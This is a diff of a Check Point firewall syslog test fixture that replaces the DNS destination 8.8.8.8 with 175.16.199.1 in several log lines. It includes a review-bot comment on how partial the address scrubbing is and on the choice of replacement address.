src:"192.168.2.2"] -<134>1 2020-03-29T17:52:21Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e055,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504341"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"54736"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T17:52:21Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e055,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504341"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"47921"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:52:21Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e055,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504341"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"54736"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:52:21Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e055,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504341"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"47921"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T17:52:21Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e055,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"13.48.233.241"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"58880"; service:"443"; service_id:"https"; 
src:"192.168.2.2"] <134>1 2020-03-29T17:52:21Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e055,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"162.159.200.1"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"39281"; service:"123"; service_id:"ntp-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T17:52:26Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e05a,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504346"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"59656"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T17:52:26Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e05a,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504346"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"53705"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:52:26Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e05a,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504346"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"59656"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:52:26Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e05a,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504346"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"53705"; service:"53"; 
service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T17:52:31Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80e05f,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"54355"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"] <134>1 2020-03-29T17:52:31Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80e05f,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"104.81.142.43"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"35426"; service:"443"; service_id:"https"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10131"; xlatesrc:"0.0.0.0"] <134>1 2020-03-29T17:52:32Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80e060,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; 
version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"42003"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"] 
@@ -3409,8 +3409,8 @@
 <134>1 2020-03-29T17:56:34Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80e152,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43103"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
 <134>1 2020-03-29T17:56:34Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80e152,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"50698"; service:"443"; service_id:"https"; src:"192.168.1.117"]
 <134>1 2020-03-29T17:56:34Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80e152,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"50699"; service:"443"; service_id:"https"; src:"192.168.1.117"]
-<134>1 2020-03-29T17:57:17Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e17d,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"57591"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:57:17Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e17d,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504637"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"56971"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:57:17Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e17d,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"57591"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:57:17Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e17d,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504637"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"56971"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:57:17Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80e17d,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"41787"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T17:57:17Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80e17d,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43548"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T17:57:17Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80e17d,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43220"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
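Review bot: The replacement address `175.16.199.1` on the two added lines is itself a routable, non-reserved address rather than one from the RFC 5737 documentation ranges (192.0.2.0/24, 198.51.100.0/24, 203.0.113.0/24), so the fixture still points at a real host; if that address is chosen deliberately (it looks like a GeoIP test-database value, but that is an inference), the commit message should say so, since a log fixture has no place for an inline comment. Only `dst:"8.8.8.8"` is rewritten in this hunk, while the neighbouring hunks in this file keep other non-reserved destinations untouched (for example `dst:"99.86.116.53"` and `dst:"104.83.198.43"`), so the scrubbing is partial; if the intent is to remove public addresses from test data, the same substitution should be applied file-wide, ideally via a scripted pass rather than by hand. Presumably the golden expected-output file for this fixture is regenerated in the same commit; it is worth confirming that `destination.ip` and any GeoIP-derived fields there changed in step with these lines.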
@@ -3418,22 +3418,22 @@ <134>1 2020-03-29T17:57:17Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e17d,0x6,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"7"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"35.165.110.9"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"60568"; service:"443"; service_id:"https"; src:"192.168.2.2"] <134>1 2020-03-29T17:57:17Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80e17d,0x7,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"8"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"104.83.198.43"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"54892"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10147"; xlatesrc:"0.0.0.0"] <134>1 2020-03-29T17:57:18Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80e17e,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; 
__policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60640"; service:"514"; service_id:"syslog"; src:"192.168.1.100"] -<134>1 2020-03-29T17:57:22Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80e182,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"51468"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"] +<134>1 2020-03-29T17:57:22Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80e182,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"51468"; 
service:"53"; service_id:"domain-udp"; src:"192.168.1.100"] <134>1 2020-03-29T17:57:22Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80e182,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"104.83.198.43"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"54898"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10148"; xlatesrc:"0.0.0.0"] -<134>1 2020-03-29T17:57:42Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e196,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & 